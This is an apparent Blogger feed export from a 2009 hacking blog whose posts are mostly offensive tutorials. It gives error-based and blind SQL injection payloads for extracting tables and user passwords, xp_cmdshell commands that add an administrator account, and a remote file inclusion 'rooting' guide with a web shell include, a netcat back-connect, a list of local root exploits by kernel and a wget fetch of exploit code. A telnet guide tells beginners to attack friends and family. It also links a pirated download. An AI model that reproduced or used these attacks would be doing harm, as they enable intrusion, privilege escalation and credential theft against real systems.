tag:blogger.com,1999:blog-53755018252703509412024-03-13T13:57:32.025-07:00:: [ Ethical mafia ] ::.http://www.blogger.com/profile/11632901016120998126noreply@blogger.comBlogger30125tag:blogger.com,1999:blog-5375501825270350941.post-72005171676603692222009-07-23T10:40:00.000-07:002009-07-23T10:41:42.466-07:00Hacking Shop Admin [ beware before trying noobs ]Get first table:<br /><br />select top 1 table_name from information_schema.tables order by table_name<br /><br />Example:<br /><br />http://site.com/ProductList.cfm?CatDisplay=371%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables %20order%20by%20table_name))--sp_password<br /><br />Get second table:<br /><br />select top 1 table_name from information_schema.tables where table_name not in (select top n table_name from information_schema.tables order by table_name) order by table_name<br /><br />Demo:<br />Table 2:<br /><br />http://site.com/ProductList.cfm?CatDisplay=371 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables order by table_name) order by table_name))--sp_password<br /><br /><br />Table3:<br /><br />http://site.com/ProductList.cfm?CatDisplay=371 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 2 table_name from information_schema.tables order by table_name) order by table_name))--sp_password<br /><br /><br />Retrieved column in the table called ten_table:<br />(only what is need to transfer ASCII)<br /><br />select top 1 column_name from information_schema.columns where table_name=ten_table order by column_name<br /><br />Get 1 Column :<br /><br />select top 1 column_name from information_schema.columns where table_name=ten_table and column_name not in(select top n column_name from information_schema.columns where table_name=ten_table order by column_name) order by column_name<br /><br />Once you have stripped and table column in the table important, you get information as usual using the following:<br /><br />Retrieved final order:<br /><br />SELECT top 1 convert(varchar,convert(varchar,isnull(convert(var char,T[1].,C[1,1]),char(32))) char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[1].,C[1,2]),char(32))) char(32) char(124) char(32) ... char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[n].,C[n,m]),char(32))))<br />FROM T[1], T[2], ..., T[n]<br />WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId<br />ORDER BY T[1].orderId desc<br /><br />Get the first order:<br /><br />SELECT top 1 convert(varchar,convert(varchar,isnull(convert(var char,T[1].,C[1,1]),char(32)))<br /><br /><br />Quote:<br /><br />char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[1].,C[1,2]),char(32))) char(32) char(124) char(32) ... char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[n].,C[n,m]),char(32))))<br />FROM T[1], T[2], ..., T[n]<br />WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId and T[1].orderId=n<br /><br />With the first table T i, C [i, j] is the j th column of the table first, orderId column is numbered order order of each table.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com4tag:blogger.com,1999:blog-5375501825270350941.post-85539420266963819852009-07-23T10:37:00.000-07:002009-07-23T10:38:51.232-07:00Fake Your IP with SSH Tunnelier and SSH Host AccountFirst We need to install Bitvise Tunnelier software (required)<br />And and SSH host Account (or SSH File Save)<br />- You can download the Tunnelier for FREE at www.bitvise.com<br />- Then install it on your PC<br />Download Link:<br />http://dl.bitvise.com/Tunnelier-Inst.exe<br />Mirror:<br />http://dl.bitvise.com.s3-external-3.amazonaws.com/Tunnelier-Inst.exe<br /><br />- Here I show how to use SSH Sock with a SSH File Save<br />- That is SSH File Save, open it. With SSH File Save you no need to do anything than run it by click Login<br />- before using just check what port of the SSH File Save<br />Click Services and see what port ^^... here is 7210<br />- OK now run the SSH File Save by click Login<br />- OK and it said succeeded. (we successfully connected with SSH host account)<br /><br />Now change your Browser Setting to use with SSH to fake your IP<br />(we can Minimize the SSH File Save).<br />- In browser, at SOCKS HOST (Sock IP) must always use:<br />127.0.0.1<br />- And the Port is the SSH Port. Sock type is SOCK5<br />- Then check our IP after faking at http://ip-address.domaintools.com<br />- And we have done ^^<br /><br />Remember keep the SSH File Save run and how to know the SSH run or NOT? It's very simple, just look the small icon of the SSH Sock at the Taskbar ...<br />When you need to remove faking SSH Sock, just simply do as me ... And we have done.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-37582736699730104072009-07-09T09:03:00.000-07:002009-07-09T09:04:02.304-07:00SQL Injection Vulnerabilities in MSSQLThis method of SQL injection in Microsoft SQL involves injecting a query that attempts converting an sql query to an interger value using convert() though fails, resulting in an error message including the result of the SQL query. This allows an attacker to execute SQL queries on a server.<br /><br />To test whether a variable is vulnerable to this type of injection, insert a ' onto the end of the value of a variable that acts with the db server, for example: index.asp?id=100' if the site is vulnerable to to this type of attack the page should produce an error msg that looks similiar to this:<br /><br />Microsoft OLE DB Provider for SQL Server error '80040e14'<br />Unclosed quotation mark before the character string<br /><br />This allows you to execute sql queries to do tasks such as map out the tables and collumns in the database allowing them to get their hands on all information inside the DB.<br /><br />convert(int, (select top 1 name from sysobjects where xtype='U' and name>'tablename'))<br />replacing tablename each time with the table name you get. Say for example from running that query you got a result of the table 'news' you'd run convert(int, (select top 1 name from sysobjects where xtype='U' and name>'news')) this would give you the next table in the database, and so on.<br /><br />Then it's possible to get the collumns inside a table by using:<br /><br />convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))<br /><br />obviously replacing TABLE with the table of your choice and colid=1 then colid=2 etc. until all collumns have been found. Of course then with basic SQL knowlege you can extend on this alot.<br /><br />If the user running the SQL server is 'dbo' (database owner) this opens up alot more possibilities including blind command exection using EXEC. To test whether a server is running under DBO you'd run:<br /><br />page.asp?vuln=convert(int,user)<br /><br />while it's DBO you can use this privilege to execute commands on the server allowing you to do things such as start or stop services, add a user account to the system and even escalate privileges to administrator as the db server is running as sysadmin.<br /><br />page.asp?vuln=1;exec master..xp_cmdshell 'net users username password /add';--<br />page.asp?vuln=1;exec master..xp_cmdshell 'net localgroup Administrators username /add';--<br /><br />after this, it's pretty useful to check if remote desktop, telnet are running etc.<br /><br />If not you could start it yourself<br /><br />This shows how clearly stupid it would be to run your db under 'dbo'.<br /><br />A few things you can do to prevent this type of SQL attack are filtering out characters such as quote marks - single and double, the semi colon and even slash and backslash and just generally tightening user input..http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-9497974238975189342009-07-09T08:58:00.000-07:002009-07-12T00:41:40.647-07:00Cable Modem uncappingIn the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes Internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link and more.<br /><br />Inside Hacking The Cable Modem, you'll learn:<br /># the history of cable modem hacking<br /># how a cable modem works<br /># the importance of firmware (including multiple ways to install new firmware)<br /># how to unblock network ports and unlock hidden features<br /># how to hack and modify your cable modem<br /># what uncapping is and how it makes cable modems upload and download faster<br /><br />Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.<br /><br /><br /><br /><a href="http://206e5027.zxxo.net"><br /><span style="font-weight: bold;"> Download now </span></a>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-63807978787938976072009-07-09T08:12:00.000-07:002009-07-09T08:13:35.581-07:00Telnet Hacking1. Introduction<br />2. Warnings<br />3. Copyright Information<br />4. Disclaimer<br />5. Who Am I?<br />6. Shout Outs<br /><br />Chapter Two: Before We Start<br /><br />1. What The Hell Is Telnet?<br />2. What Was The Original Purpose?<br />3. What Can I Do With It?<br />4. Is It Illegal?<br />5. Will I Go To Jail?<br />6. Is It Fun?<br /><br /><br />Chapter Three: Getting Started<br /><br />1. Possible Targets<br />2. Is The Target Alive?<br />3. Scanning For Ports<br />4. Getting An IP<br />4.A. Messenger<br />4.B. Social Engineering It<br />4.C. Your Firewall<br /><br />Chapter Four: Connecting<br /><br />1. Connecting To An IP<br /><br /><br />Chapter Five: What To Do After Your Connected<br /><br />1. Doing Something!<br />2. FTP<br /><br />Chapter Six: Cracking A Pass<br /><br />1. Brutus<br />2. Password Lists<br />3. Default Passwords<br /><br /><br />Chapter Seven: FAQ's<br /><br />1. 'I Get A Blank Screen After Connecting!'<br />2. 'It Says It Can't Connect! WTF!'<br />3. 'My Computer Flips Off After Connecting!'<br />4. 'Where Do I Type My Commands?'<br />5. 'I Got Arrested!!! Can I Sue You?'<br /><br /><br />Chapter Eight: Wrapping Up<br /><br />1. Contact Me<br />2. TGS<br /><br /><br /><br />~`CHAPTER ONE: INTRODUCTION`~<br /><br /><br />~`Introduction`~<br /><br />Hey. I decided that my old telnet tutorial was not sufficient, so I<br />decided to redo it, among all the other work I have to do. This will<br />provide a step by step method to: Connect to an IP, Connect to a<br />certain port, Decide if the port is responsive, Find commands that you<br />can use on this 'Box', Use the commands, Crack a password using<br />'Brutus', Find Targets, and many other things. It will also include<br />many pictures that you can use as a reference. Remember, all command<br />prompts are different, don't be discouraged.<br /><br /><br />~`Warnings`~<br /><br />This is a form of hacking. Whether you do or do not damage a computer,<br />you are committing a felony. Connecting to a computer or something of<br />the kind without permission is punishable by law and will get you corn<br />holed in a state prison by a 365 pound, one eared black man by the<br />name of bubba. You can be held to Criminal, as well as Civil suites<br />for your actions.<br /><br />Doing this is a good way to get enemies' also. Remember, there are<br />hundreds of hacking groups out there, and hundreds of hackers, there's<br />a chance that you can be fucking with a hacker of a group, and that is<br />not a fun thing to do.<br /><br /><br /><br />~`Copyright Information`~<br /><br />This or any portion of this paper is allowed to be duplicated. You may<br />host it on your site, as long as it stays intact. Failure to comply<br />with this will result in swift legal action.<br /><br /><br /><br />~`Disclaimer`~<br /><br />I cannot be held responsible for your actions because of this. I will<br />not take responsibility. If you don't agree with this, DO NOT READ<br />FURTHER. I do not condone hacking, as well as any other form of<br />illegal behavior. Also, you will encounter a number of IP's in this<br />forum, DO NOT USE ANY OF THEM. The ones I used for demonstration I did<br />not hurt, and I take no responsibility if you do use them. You have<br />been warned.<br /><br />NOTE: I used <a href="http://www.sjms.org/" target="_blank">www.sjms.org</a> (the website of a fine military academy) in<br />some of my examples. I mean no harm to come to <a href="http://www.sjms.org/" target="_blank">www.sjms.org</a>. I did not<br />hack <a href="http://www.sjms.org/" target="_blank">www.sjms.org</a>, and I don't recommend you doing it either. I take<br />no responsibility if you do though.<br /><br /><br /><br />~`Who Am I?`~<br /><br />I am Errorised of the <a href="http://www.waushare.com/" target="_blank">www.waushare.com</a> forums. If you'd like to get a hold of me, do<br />so at <a href="mailto:koft@habbocommunity.co.uk">koft@habbocommunity.co.uk</a><br /><br /><br /><br />~`Shout Outs`~<br /><br />Hey I'd like to say hello to my good buddies: Wau / Placi / Maki / Unstable /<br />Phantom / BOOSTER / Chaos Zero / T1M3 / M4K3 / RedFox / Mr.Wolves / h3r3t1c<br />and whoever else I forgot (due to the pot) These are all buddies, as<br />well as PSP-Hacks members.<br /><br /><br /><br />~`CHAPTER TWO: BEFORE WE START`~<br /><br /><br />~`What Was The Original Purpose Of Telnet?`~<br /><br />Telnet was originally made for someone to do all sorts of things. From<br />checking your mail to connecting to your company's server while on a<br />business trip, telnet does it all. The makers of<br /><br />it had a dream in mind that the average person could deal with<br />command/text based programs. But of course when the masses got into it<br />and every brother and sister bought a computer,<br /><br />Windows was made, which totally destroyed most text based programs.<br />Now fucking idiots run computers and company's with computers, and<br />can't even deal with a damn telnet program!<br /><br /><br />~`What Can I Do With It?`~<br /><br />Although Telnet has died for the business men, it is still growing<br />quickly with the not-so-trustful person. For the hacker, Telnet is the<br />hammer in the tool box. Telnet is one of the most<br /><br />world wide programs among hackers, as well as other fun loving people.<br />When you finally hit that golden hack after your first long hours of<br />struggling with telnet (not!), you are god!<br /><br />You can change other people's passwords, snoop on e-mails, forge dirty<br />e-mails to ones lover,<br /><br /><br />~`Is It Illegal?`~<br /><br />Two words: HELL YES. Hacking is the most illegal thing one can do on<br />the internet. Do not be mistaken, it's quite illegal.<br /><br /><br /><br />~`Will I Go To Jail?`~<br /><br />Only if you're caught. This is why it's good to encrypt your entire<br />hard rive, if they can't get anywhere in your hard rive, how the hell<br />are they going to charge you with anything? It is very good to be<br />paranoid. My computer is a vault. The military runs 1800 bit<br />encryption tops. The average bit encryption for any given file in my<br />computer is around 7000, Triple Blowfish encrypted. There's also a<br />shredder that hides in the startup registry that I made in a batch<br />file, it hides there and if you don't turn it off within 15 seconds of<br />starting up, bye bye computer and bye bye evidence. It's always good<br />to be paranoid.<br /><br /><br />~`Is It Fun?`~<br /><br />Despite my comments about jail, it is quite fun. Most hackers do what<br />they do for the simple thrill of knowing secrets that no ones supposed<br />to know. Having inside information on people<br /><br />who they barely know or care about. Knowing top secret information<br />that only god and the president are supposed to know, now that's fun!<br /><br /><br /><br />~`CHAPTER THREE: GETTING STARTED`~<br /><br /><br />~`Possible Targets`~<br /><br />A target is a person, place, or thing (kind of like a noun, eh?) in<br />which you are planning on attacking. A target can be anyone! Common<br />targets include: Family, Friends, Government, Phone<br /><br />Company's, and Former Attackers. Normally the first target is a friend<br />or family member, someone who's not so smart and someone you know for<br />a fact has no security. Security just gets in the way. '7337' hackers<br />learn to deal with security, newbie's fall into the trap. So for now<br />stick with someone easy.<br /><br /><br />~`Is The Target Alive?`~<br /><br />Go to command prompt (or Ms-DOS) and type ping 0.0.0.0. (replacing the<br />zeros for the real IP). If it returns, then the computer is connected<br />to the internet. If it says that its lost, then the computer offline<br />(duh!).<br /><br /><br /><br />~`Scanning For Ports`~<br /><br />We will be using Blues Port Scanner to scan for ports. You can get<br />blues port scanner at download.com or <a href="http://www.library.2ya.com/" target="_blank">www.library.2ya.com</a>. It is about<br />400 KB, not too big.<br />You scan an IP for ports by pasting (CTRL V) the IP in both boxes in<br />the top. This makes it scan only that ip. You then put the selected<br />range of ports in which you wish to scan.<br /><br />The more you scan, the more of a chance they will notice your<br />movements, but do as you please.<br /><br /><br /><br /><br /><br />~`Getting An IP`~<br /><br />IP is short for Internet Protocol. Each computer has an IP. Getting<br />someones IP can be as easy as asking for it. Here's a few ways:<br /><br />Messenger:<br /><br />Ok, so you have MSN messenger. Your a 'bad mofo', a 'rough rider', now<br />its time to get what you need from your victim. The first thing to do<br />is build trust. It would be wise to do this on someone you know will<br />trust you enough to buy into your shit. Here's how you get their IP:<br /><br />1. Send them a file through MSN (or whatever they have). It can be<br />anything, a game, a dead hamster, a naked picture of yourself,<br />whatever.<br /><br />2. Once they accept, go into Command Prompt and type "netstat".<br /><br />3. With a bit of hunting and picking you should be able to find their<br />IP in the box.<br /><br /><br /><br /><br />Social Engineering:<br /><br />Social Engineering is a fancy term that people use to discribe smooth<br />talkers. Social Engineerers are slick, smooth, smart, and know what<br />their talking about. They get into the part before<br /><br />attacking, they have great social skills and are easy people to trust.<br />Social Engineerers build up a nice level of trust, the more the<br />better, until they get the information they want.<br />Once, on a SC 'field trip' with a friend of mine, we actually got<br />dressed up to walk to a payphone and make the attack that we've been<br />building trust for months. It was worth it.<br /><br />But anyway, back to the subject.<br /><br />Usually, all you need to do is ask the person. If they know better<br />then to give you the IP if you flat out ask them, then they will know<br />better then if you try to scare it out of them. Get em to go to<br />ipchicken.com and give you the numbers in the blue letters.<br /><br /><br />Your Firewall:<br /><br />If you have a firewall, then chances are you've seen someone trying to<br />scan you for open ports. If you use Black ICE, all the better. I<br />suggest you download it at <a href="http://www.library.2ya.com/" target="_blank">www.library.2ya.com</a>.<br /><br />What Black ICE does is gather up all the attempts to port probe you,<br />connect to your computer, or anything else, and stick it in a database<br />for further use. You can easily pick out targets from the list and use<br />them for your will.<br /><br />Double click on the person you wish to get the ip with, and on the<br />right it gives you the IP AND the DNS! How nice eh?<br /><br /><br />~`CHAPTER FOUR: CONNECTING`~<br /><br /><br />~`Connecting To An IP`~<br /><br /><br />Ok, so you've got your list of open ports on the computer. For this<br />demonstration I'll be using someone who attempted to hack me a while<br />back. After scanning a few thousand ports, we come up with this list.<br />Now not all of these allow connections. The ones labeled with a red<br />box next to them are 'dead' ports for the telnet program. This is<br />usually because they only communicate using a certain 'language' that<br />Telnet doesn't support. When you try to connect to these you get a<br />blank screen with dashs where you try to type (see below). The<br />listings labeled with a green next to them allow connections and will<br />talk to you without having to give it a user or pass. The ones labeled<br />with a blue box next to them means that they are responsive, are not<br />dead, but they require authentication before your allowed to connect.<br />If you really need into this computer and they've got password<br />protected ports, there's a section later in the paper that tells you<br />how to get in. So anyway, lets focus on the responsive port. This is<br />unfortunately the SMTP port (Simple Mail Transfer Protocol). Although<br />it does not allow a significate amount of access to this persons<br />computer without knowing advanced things, it does give us a good basis<br />for a demonstration in Telneting. Below will show you step by step on<br />how to connect and other things with this port.<br /><br /><br /><br /><br />1. Connect to the computer by typing "Telnet 0.0.0.0 25" in Command<br />Prompt/Ms DOS. You should replace the "0.0.0.0" for the IP address you<br />wish to connect to, and the 25 for the specific port you plan on<br />connecting to. For this demonstration, I will be using the IP<br />161.58.163.4 and the port 25. So the command should read "telnet<br />161.58.163.4 25". There's no special place to type (as I've received<br />many e-mails questioning this), when you type, it should show up at<br />the bottom.<br /><br /><br /><br />2. Press enter.<br /><br /><br /><br /><br />Congratulations! You just made your first connection! Although it's<br />not a quantum leap in the exploration of computer security, it's a<br />start.<br /><br /><br />~`Doing Something After You Connect<br /><br /><br />~`CHAPTER FIVE: WHAT TO DO AFTER YOUR CONNECTED`~<br /><br />~`Doing Something!`~<br /><br /><br />Alright, so you've got your open connection on an open port. It's best<br />to keep the connection time down to a minimum to reduce them knowing.<br />I'll now demonstrate on what to do after you're connected.<br /><br /><br />1. Generically speaking, typing help will give you a list of all the<br />commands supported for that Box. However, some require you to log on<br />before doing so, what a drag!<br />Alright, after typing help this is how it responded.<br /><br /><br /><br />You see that there's a nice listing of commands you can use. Since<br />this port is not pass protected, you have no worries about<br />restrictions. Typing "help" and then the command in which you want<br />help on will make it elaborate, which is a great feature for a newbie!<br />This is a pic of me asking it to elaborate on a few things.<br /><br /><br /><br /><br />2. You can never forget to say "hello". It's quite rude to run through<br />someone's home (computer) without even introducing yourself. This<br />young lady was much nicer after I said "helo" to it.<br /><br /><br />[NOTE: I lost the pics and I'm too fucking lazy to make a helo pic…<br />I'm sure you're smart enough to figure it out]<br /><br /><br />3. Use the commands in the box to figure out what you want to do.<br />Since every computer and port is different, it is impossible for me to<br />show you every single thing you can do. Learn to get off your bum and<br />ask it what some of the commands mean, its a good learning tool.<br /><br /><br />~`FTP`~<br /><br />You can also connect to port 21 (FTP, or File Transfer Protocol) using<br />telnet. Typing help will give you a listing that you nee<br /><br /><br /><br /><br />~`CHAPTER SIX: CRACKING A PASSWORD`~<br /><br />~`Brutus`~<br /><br />Brutus is a great Brute Force password cracker. It is easy to use for<br />the newbie, fast, and reliable. You can find it by doing a search at<br /><a href="http://www.google.com/" target="_blank">www.google.com</a> for "Brutus".<br /><br /><br />~`Password Lists`~<br /><br />I'm proud to announce that two of our TGS members, The_IRS and<br />Computer Geek, have combined many lists and have came out with a<br />password list with a total of 2.1 passwords. You can download it here:<br /><a href="http://www.aftdesign.com/hacking/passwords.html" target="_blank">http://www.aftdesign.com/hacking/passwords.html</a><br /><br /><br />~`Default Passwords`~<br /><br />You can find many lists of default passwords for any operating systems<br />on the web. Doing a search at google.com for "Default Password Lists"<br />will come in handy. Here is a very good site with many default<br />passwords that you can access in the meantime:<br /><a href="http://www.phenoelit.de/dpl/dpl.html" target="_blank">http://www.phenoelit.de/dpl/dpl.html</a><br /><br /><br /><br />~`CHAPTER SEVEN: FAQ`~<br /><br />1. "I Get A Blank Screen After Connecting!"<br /><br />The port that your connecting to is 'dead', or unusable. This could be<br />due to a number of different things. For instance, lets say that your<br />trying to connect to someones computer through telnet, on the kazza<br />port (which I beleive is 1214). This port is not designed to take<br />packets (data) from the telnet program, and is specifically designed<br />to give and receive packets (data) from the kazza program. This could<br />be one of your problems. Trying to connect to a backdoor for a Sub7<br />program will also do the same.<br /><br /><br />2. "It Says I Can't Connect! WTF!"<br /><br />This is because the port is either closed, or the computer is firewall<br />protected. As a newbie I wouldn't suggest messing with it.<br /><br /><br /><br />3. "My Computer Flips Off After Connecting!"<br /><br />I'll bet money your using Windows. You are aren't ya? I knew it! This<br />is a Windows Dump File. Either update Windows, get Linux, or forget<br />hacking.<br /><br /><br /><br />4. "Where Can I Type My Commands?"<br /><br />Type a few letters to see where they commands will show up. Most<br />likely it will be at the bottom of the Command Prompt/MS DOS screen.<br /><br /><br /><br />5. "I Got Arrested!!! Can I Sue You?"<br /><br />NO! You read my disclaimer at the top. I don't care who you are, I'm<br />not taking responsibility.<br /><br /><br /><br />RoMeO.....http://www.blogger.com/profile/11632901016120998126noreply@blogger.com7tag:blogger.com,1999:blog-5375501825270350941.post-50585915071750280012009-07-09T05:42:00.000-07:002009-07-09T05:43:32.797-07:00Blind SQL Injection<pre>Blind injection is a little more complicated the classic injection but it can be done :D<br /><br />I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D<br /><br />Let's start with advanced stuff.<br /><br />I will be using our example<br /><br />http://www.site.com/news.php?id=5<br /><br />when we execute this, we see some page and articles on that page, pictures etc...<br /><br />then when we want to test it for blind sql injection attack<br /><br />http://www.site.com/news.php?id=5 and 1=1 <--- this is always true<br /><br />and the page loads normally, that's ok.<br /><br />now the real test<br /><br />http://www.site.com/news.php?id=5 and 1=2 <--- this is false<br /><br />so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.<br /><br />1) Get the MySQL version<br /><br />to get the version in blind attack we use substring<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4<br /><br />this should return TRUE if the version of MySQL is 4.<br /><br />replace 4 with 5, and if query return TRUE then the version is 5.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5<br /><br />2) Test if subselect works<br /><br />when select don't work then we use subselect<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and (select 1)=1<br /><br />if page loads normally then subselects work.<br /><br />then we gonna see if we have access to mysql.user<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1<br /><br />if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.<br /><br />3). Check table and column names<br /><br />This is part when guessing is the best friend :)<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)<br /><br />then if the page loads normally without content missing, the table users exits.<br />if you get FALSE (some article missing), just change table name until you guess the right one :)<br /><br />let's say that we have found that table name is users, now what we need is column name.<br /><br />the same as table name, we start guessing. Like i said before try the common names for columns.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1<br /><br />if the page loads normally we know that column name is password (if we get false then try common names or just guess)<br /><br />here we merge 1 with the column password, then substring returns the first character (,1,1)<br /><br /><br />4). Pull data from database<br /><br />we found table users i columns username password so we gonna pull characters from that.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80<br /><br />ok this here pulls the first character from first user in table users.<br /><br />substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value<br /><br />and then compare it with simbol greater then > .<br /><br />so if the ascii char greater then 80, the page loads normally. (TRUE)<br /><br />we keep trying until we get false.<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95<br /><br />we get TRUE, keep incrementing<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98<br /><br />TRUE again, higher<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99<br /><br />FALSE!!!<br /><br />so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.<br /><br />then let's check the second character.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99<br /><br />Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99<br /><br />TRUE, the page loads normally, higher.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107<br /><br />FALSE, lower number.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104<br /><br />TRUE, higher.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105<br /><br />FALSE!!!<br /><br />we know that the second character is char(105) and that is 'i'. We have 'ci' so far<br /><br />so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).<br /><br />There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,<br /><br />cause that makes you better SQL INJECTOR :D<br /><br /><br /><br />Hope you learned something from this paper.<br /><br /><br />Have FUN! (:<br /><br />RoMeO.......<br /><br /><br /></pre>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com2tag:blogger.com,1999:blog-5375501825270350941.post-47924876709308373952009-07-06T23:57:00.001-07:002009-07-06T23:57:53.229-07:00R.F.I. Rooting<pre>You will need:<br /><br />- Vulnerable Site in R.F.I.<br />- Shell for R.F.I. (e.g. c99, r57 or other)<br />- NetCat<br />- Local Root Exploit (depending on the kernel and the version)<br /><br />This aim tutorial is to give a very general picture in process of Rooting<br />in Linux Server with Safe Mod: OFF.<br /><br />-<br /><br />Suppose that we have found a site with R.F.I. vulnerability:<br /><br />http://www.hackedsite.com/folder/index.html?page=<br /><br />e can run shell exploiting Remote File Inclusion, as follows:<br /><br />http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?<br /><br />where evilscript.txt is our web shell that we have already uploaded to<br />our site. (www.mysite.com in the folder: shells)<br /><br />After we enter in shell, first of all we will see the version of the kernel<br />at the top of the page or by typing: uname - a in Command line.<br /><br />To continue we must connect with backconnection to the box. This can done with<br />two ways if we have the suitable shell.<br /><br />We can use the Back-Connect module of r57/c99 shell or to upload a backconnector<br />in a writable folder<br /><br />In most of the shells there is a backconnection feature without to upload the<br />Connect Back Shell (or another one shell in perl/c). We will analyze the first<br />way which is inside the shell (in our example the shell is r57).<br /><br />Initially we open NetCat and give to listen in a specific port (this port must<br />be correctly opened/forwarded in NAT/Firewall if we have a router) with the<br />following way:<br /><br />We will type: 11457 in the port input (This is the default port for the last versions<br />of r57 shell). We can use and other port.<br /><br />We press in Windows Start -> Run -> and we type: cmd<br />After we will go to the NetCat directory:<br /><br />e.g.<br /><br />cd C:\Program Files\Netcat<br /><br />And we type the following command:<br /><br />nc -n -l -v -p 11457<br /><br />NetCat respond: listening on [any] 11457 ...<br /><br />In the central page of r57 shell we find under the following menu::: Net:: and<br />back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if<br />we have dynamic)<br /><br />In the Port form we will put the port that we opened and NetCat listens.<br /><br />If we press connect the shell will respond:<br /><br />Now script try connect to <ip> port 11457 ...<br /><br />If our settings are correct NetCat will give us a shell to the server<br /><br />Now we wil continue to the Rooting proccess.<br /><br />We must find a writable folder in order to download and compile the Local<br />Root Exploit that will give us root priviledges in the box. Depending on the version<br />of the Linux kernel there are different exploits. Some times the exploits fail to run<br />because some boxes are patched or we don't have the correct permissions.<br /><br />List of the exploits/kernel:<br /><br />2.4.17 -> newlocal, kmod, uselib24<br />2.4.18 -> brk, brk2, newlocal, kmod<br />2.4.19 -> brk, brk2, newlocal, kmod<br />2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2<br />2.4.21 -> brk, brk2, ptrace, ptrace-kmod<br />2.4.22 -> brk, brk2, ptrace, ptrace-kmod<br />2.4.22-10 -> loginx<br />2.4.23 -> mremap_pte<br />2.4.24 -> mremap_pte, uselib24<br />2.4.25-1 -> uselib24<br />2.4.27 -> uselib24<br />2.6.2 -> mremap_pte, krad, h00lyshit<br />2.6.5 -> krad, krad2, h00lyshit<br />2.6.6 -> krad, krad2, h00lyshit<br />2.6.7 -> krad, krad2, h00lyshit<br />2.6.8 -> krad, krad2, h00lyshit<br />2.6.8-5 -> krad2, h00lyshit<br />2.6.9 -> krad, krad2, h00lyshit<br />2.6.9-34 -> r00t, h00lyshit<br />2.6.10 -> krad, krad2, h00lyshit<br />2.6.13 -> raptor, raptor2, h0llyshit, prctl<br />2.6.14 -> raptor, raptor2, h0llyshit, prctl<br />2.6.15 -> raptor, raptor2, h0llyshit, prctl<br />2.6.16 -> raptor, raptor2, h0llyshit, prctl<br /><br />We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.<br /><br />Some sites that we can find Local Root Exploits:<br /><br />www.milw0rm (Try Search: "linux kernel")<br /><br />Other sites: www.packetstormsecurity.org | www.arblan.com<br />or try Googlin' you can find 'em all ;-)<br /><br />We can find writable folders/files by typing:<br /><br />find / -perm -2 -ls<br /><br />We can use the /tmp folder which is a standard writable folder<br /><br />We type: cd /tmp<br /><br />To download the local root exploit we can use a download command for linux like<br />wget.<br /><br />For example:<br /><br />wget http://www.arblan.com/localroot/h00lyshit.c<br /><br />where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.<br /><br />After the download we must compile the exploit (Read the instruction of the exploit<br />before the compile)<br /><br />For the h00lyshit we must type:<br /><br />gcc h00lyshit.c 